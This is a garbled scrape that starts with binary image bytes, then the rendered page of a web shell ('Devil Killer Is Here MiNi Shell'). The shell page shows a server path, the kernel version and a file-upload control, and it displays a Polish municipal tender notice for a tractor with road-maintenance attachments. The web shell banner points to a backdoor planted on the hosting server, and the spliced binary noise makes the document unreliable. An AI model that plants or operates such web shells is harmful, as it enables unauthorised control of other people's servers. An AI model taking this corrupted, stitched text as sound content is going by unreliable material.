JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220126/0003546801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup traktora z osprzętem na potrzeby gospodarki komunalnej i drogownictwa </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Nurzec-Stacja</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659585</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żerczycka 33, 17-330 Nurzec-Stacja</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nurzec-Stacja</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">17-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">85 6575078</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">85 6575063</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@nurzec-stacja.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nurzec-stacja.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka komunalna i drogownictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup traktora z osprzętem na potrzeby gospodarki komunalnej i drogownictwa </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-61f0992f-7dd0-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00035468</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00000843/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup traktora z osprzętem na potrzeby gospodarki komunalnej i drogownictwa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.ug.nurzec.wrotapodlasia.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl ,<br/>https://epuap.gov.pl/wps/portal dodatkowo komunikacja za pomocą poczty elektronicznej ug@nurzecstacja.<br/>eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Postępowanie prowadzone jest w języku polskim w formie elektronicznej na stronie internetowej<br/>zamawiającego http://bip.ug.nurzec.wrotapodlasia.pl./ oraz za pośrednictwem portalu<br/>https://miniportal.uzp.gov.pl<br/>2. Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu mini Portalu, który<br/>dostępny jest pod adresem https://miniportal.uzp.gov.pl , adres skrzynki EPUAP:<br/>/7r9e4c1bmr/SkrytkaESP<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP, gdzie ma dostęp do formularzy:<br/>„Formularz do złożenia, zmiany, wycofania oferty lub wniosku&#34; oraz do „Formularza<br/>do komunikacji&#34;,<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu mini Portal oraz Warunkach korzystania z<br/>elektronicznej platformy.<br/>5. Maksymalny rozmiar plików przesyłany za pośrednictwem dedykowanych formularzy wynosi 150<br/>MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych jest Gmina Nurzec-Stacja, ul. Żerczycka 33, 17-330<br/>Nurzec-Stacja ;<br/>2. inspektorem ochrony danych osobowych w Gminie Nurzec-Stacja jest Pan Karol Wawrzyniak<br/>kontakt - e-mail: iod@nurzec-stacja.eu<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego<br/>prowadzonym w trybie postępowania o udzielenie zamówienia publicznego.<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ustawy Prawo<br/>zamówień publicznych (Dz. U. z 2021 r. poz. 1129, z późn zm.);<br/>5. Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia<br/>postępowania a udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO<br/>8. posiada Pani/Pan:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących;<br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych **;<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2<br/>RODO;<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych,<br/>gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>9. nie przysługuje Pani/Panu:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10. przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RRG.7021.11.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa fabrycznie nowego ciągnika rolniczego z tuzem<br/>wyprodukowanego w 2021 roku z normą emisji spalin minimum STAGE III o mocy maksymalnej<br/>min. 50 KM, przystosowanego do poruszania się po drogach publicznych, wraz z nowym<br/>fabrycznie sprzętem towarzyszącym typu: kosiarka bijakowa, pług do odśnieżania, zamiatarka,<br/>rozsiewacz komunalny w szczególności do utrzymania porządku i czystości w pasach<br/>drogowych dróg gminnych na terenie Gminy Nurzec-Stacja.<br/>2. Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 1A do SWZ -<br/>Wymagania techniczne dla ciągnika rolniczego, kosiarki bijakowej, pługu do<br/>odśnieżania, zamiatarki oraz rozsiewacza komunalnego. Szczegółowe warunki<br/>realizacji przedmiotu zamówienia określa załącznik nr 7 - projekt umowy.<br/>3. Wypełniony i podpisany przez Wykonawcę załącznik Nr 1 do SWZ stanowi integralną<br/>część oferty i nie podlega uzupełnieniu w trybie art. 126 ust. 3 ustawy – Prawo<br/>zamówień publicznych.<br/>4. Wykonawca dostarczy kompletny ciągnik rolniczy ze sprzętem towarzyszącym tj.<br/>kosiarką bijakową, pług do odśnieżania, zamiatarka, rozsiewacz komunalny, wraz z niezbędnym<br/>wyposażeniem i dokumentami, do siedziby Zmawiającego, tj. Urzędu<br/>Gminy w Nurcu-Stacji, ul. Żerczycka 33, 17-330 Nurzec-Stacja, na własny koszt i ryzyko.<br/>5. Dostarczony ciągnik powinien być wyposażony w szczególności w silnik<br/>wysokoprężny o mocy znamionowej nie niższej niż 50 KM, normę emisji spalin<br/>STAGE III, klimatyzowaną i ogrzewaną przeszkloną kabinę, skrzynię przekładniową<br/>min. 12x12 z rewersem elektro - hydraulicznym, przedni TUZ, podnośnik sterowany<br/>elektronicznie o udźwigu min. 2200 kg.<br/>6. Dostarczony ciągnik rolniczy powinien posiadać wyposażenie oraz parametry<br/>techniczne, w szczególności moc silnika, wydajność układu hydraulicznego, masę,<br/>rozstaw osi, rozstaw kół, ogumienie – odpowiednie i niezbędne do zamocowania,<br/>napędu, sterowania oraz pracy ze sprzętem wchodzącym w skład przedmiotu<br/>zamówienia, tj. kosiarką bijakową, pługiem do odśnieżania, zamiatarką, rozsiewaczem<br/>komunalnym.<br/>7. Oferowany ciągnik rolniczy powinien być dopuszczony do obrotu na terytorium Polski oraz<br/>przystosowany do ruchu po drogach publicznych na terytorium Polski, w<br/>szczególności powinien spełniać wymagania określone przepisami ustawy z dnia 20<br/>czerwca 1997 r. Prawo o ruchu drogowym (tekst jedn. Dz. U. z 2021 r. poz. 450) oraz<br/>Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków<br/>technicznych pojazdów oraz ich niezbędnego wyposażenia (tekst jedn. Dz. U. z 2016 r. poz.<br/>2022).<br/>8. Oferowany ciągnik rolniczy powinien spełniać w zakresie emisji zanieczyszczeń<br/>wymagania normy minimum STAGE III.<br/>9. Wykonawca zobowiązany jest złożyć wraz z ofertą kopię wyciągu ze świadectwa<br/>homologacji typu pojazdu lub świadectwa homologacji typu WE pojazdu, lub decyzji o<br/>dopuszczeniu jednostkowym pojazdu oferowanego ciągnika rolniczego. Jeśli<br/>wymienione dokumenty nie zawierają danych na temat spełnianej przez oferowany<br/>ciągnik normy emisji zanieczyszczeń lub danych określających emisję tlenku węgla,<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>węglowodorów, tlenków azotu oraz cząstek stałych przez oferowany ciągnik<br/>(zastosowany w oferowanym ciągniku silnik), Wykonawca zobowiązany jest złożyć<br/>wraz z ofertą dokument sporządzony przez producenta ciągnika lub jego<br/>upoważnionego przedstawiciela, zawierający te informacje.<br/>10. Wykonawca w ramach realizacji przedmiotu zamówienia przeszkoli jednego<br/>pracownika Urzędu Gminy w Nurcu-Stacji w zakresie eksploatacji, obsługi i konserwacji<br/>dostarczonego sprzętu.<br/>11. Szczegółowy opis oraz sposób realizacji zamówienia zostały zawarte w Opisie<br/>przedmiotu zamówienia stanowiącym Załącznik nr 1A do SWZ - Wymagania<br/>techniczne dla ciągnika rolniczego wraz ze sprzętem towarzyszącym.12.<br/>12. Zamawiający wymaga udzielenia gwarancji jakości na cały przedmiot umowy na<br/>okres minimum 24 miesiące (na ciągnik wraz ze sprzętem towarzyszącym), licząc ten okres od<br/>daty odbioru końcowego lub odbioru końcowego usunięcia usterek, jeżeli takie będą<br/>stwierdzone.<br/>13. Jeżeli Wykonawca stwierdzi, że użyte w SWZ i w załącznikach do SWZ parametry lub normy<br/>krajowe lub przenoszące na normy europejskie lub normy międzynarodowe<br/>mogą wskazywać na producentów produktów lub źródła ich pochodzenia to oznacza,<br/>że mają takie znaczenie, że parametry techniczne tak wskazanych produktów określają<br/>minimalne wymagania Zamawiającego co do jakości produktów, które mają być użyte<br/>do wykonania przedmiotu umowy. Wykonawca jest uprawniony do stosowania<br/>produktów równoważnych, przez które rozumie się takie, które posiadają parametry<br/>techniczne nie gorsze od tych wskazanych w SWZ i w załącznikach do SWZ tzn. takie<br/>same lub lepsze oraz są fabrycznie nowe, nieregenerowane, nie z recyklingu. Na<br/>Wykonawcy spoczywa ciężar wskazania „równoważności”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">16700000-2 - Ciągniki</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">16000000-5 - Maszyny rolnicze</p> <p class="mb-0">16310000-1 - Kosiarki</p> <p class="mb-0">34921000-9 - Sprzęt do konserwacji dróg</p> <p class="mb-0">43313000-0 - Pługi odśnieżające lemieszowe i wirnikowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">serwis</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1. nie podlegają wykluczeniu,<br/>2. spełniają warunki udziału w postępowaniu dotyczące:<br/>a) zdolności technicznej lub zawodowej:<br/>w zakresie posiadania wiedzy i doświadczenia Zamawiający uzna warunek za spełniony, jeśli<br/>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w<br/>tym okresie, co najmniej jednej dostawy (fabrycznie) nowego ciągnika<br/>rolniczego o mocy co najmniej 50 KM wraz ze sprzętem towarzyszącym o<br/>wartości nie mniejszej niż 200000,00 PLN brutto wraz z podaniem jej<br/>wartości, daty, oraz podmiotu, na rzecz którego dostawa została wykonana,<br/>z załączeniem dowodów określających, że dostawa została wykonana<br/>należycie.<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>b) w zakresie posiadania potencjału osób skierowanych przez Wykonawcę do<br/>realizacji zamówienia: Zamawiający nie stawia wymagań w tym zakresie<br/>c) sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia wymagań w<br/>tym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">dokumenty potwierdzające brak podstaw do wykluczenia:<br/>1) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w zrozumieniu ustawy z dnia 16 lutego2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej (załącznik nr 5 do SWZ),<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) dokumenty potwierdzające spełnianie warunków udziału w<br/>postępowaniu:<br/>1) w celu potwierdzenia spełniania warunku, o którym mowa w Rozdziale 16 SWZ, pkt 2ppkt 1),<br/>Wykonawca wykaże (wg wzoru – załącznik nr 4 do SWIZ – wykaz dostaw), że w okresie ostatnich 3 lat<br/>przed upływem składania ofert wykonał co najmniej jednej dostawy (fabrycznie) nowego ciągnika<br/>rolniczego o mocy co najmniej 50 KM wraz ze sprzętem towarzyszącym o wartości nie mniejszej niż<br/>200 000,00 PLN brutto wraz z podaniem jej wartości, daty, oraz podmiotu, na rzecz którego dostawa<br/>została wykonana, z załączeniem dowodów określających, że dostawa została wykonana należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot,<br/>na rzecz którego dostawa była wykonywana, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. Jeśli wartości<br/>zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs PLN do tej waluty<br/>podawany przez NBP na dzień opublikowania ogłoszenia w Biuletynie Zamówień Publicznych. Jeżeli w<br/>dniu publikacji ogłoszenia o zamówieniu, Narodowy Bank Polski nie publikuje średniego kursu danej<br/>waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po<br/>dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> 